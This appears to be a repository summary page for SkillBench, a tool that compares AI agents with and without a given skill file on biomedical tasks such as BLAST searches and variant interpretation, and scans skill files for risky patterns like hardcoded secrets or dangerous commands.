boheling / skillbench
PublicAdversarial, deterministic benchmarking for AI agent skills — measures whether a skill makes the agent measurably better. Includes biomedical eval cases.
SkillBench is a testing tool that measures whether an AI skill actually helps an assistant perform better. It compares two versions of an AI solving the same tasks - one with the skill loaded, one without - and uses automatic rules to grade their outputs. The tool also scans for security problems like hardcoded secrets or dangerous commands. It produces clear reports with scores across four areas: correctness, security, completeness, and whether the skill meaningfully improved results over a baseline. The project includes pre-built test cases for biomedical work like BLAST searches, protein structure analysis, drug interaction checks, and genetic variant interpretation.
How It Works
You created a SKILL.md file with instructions for tasks like analyzing genes, finding protein structures, or checking drug interactions.
SkillBench checks your skill files for risky patterns like hardcoded passwords, dangerous commands, or attempts to send your data somewhere else.
SkillBench creates two parallel test runs: one AI gets your skill loaded, the other solves the same tasks without any guidance.
Each AI tackles the same challenges - retrieving protein structures, interpreting genetic variants, checking drug safety - and saves their results.
Run a security-only check if you just want to find hidden vulnerabilities
Run a complete comparison if you want to know if your skill actually helps
A clean report shows you four scores: correctness, security, completeness, and whether having your skill actually beat the baseline.
Scores of 75+ mean your skill is recommended, 50-74 means acceptable, below 50 means it needs improvement before relying on it.
Star Growth
Repurpose is a Pro feature
Generate ready-to-use prompts for X threads, LinkedIn posts, blog posts, YouTube scripts, and more -- with full repo context baked in.
Unlock RepurposeSimilar repos coming soon.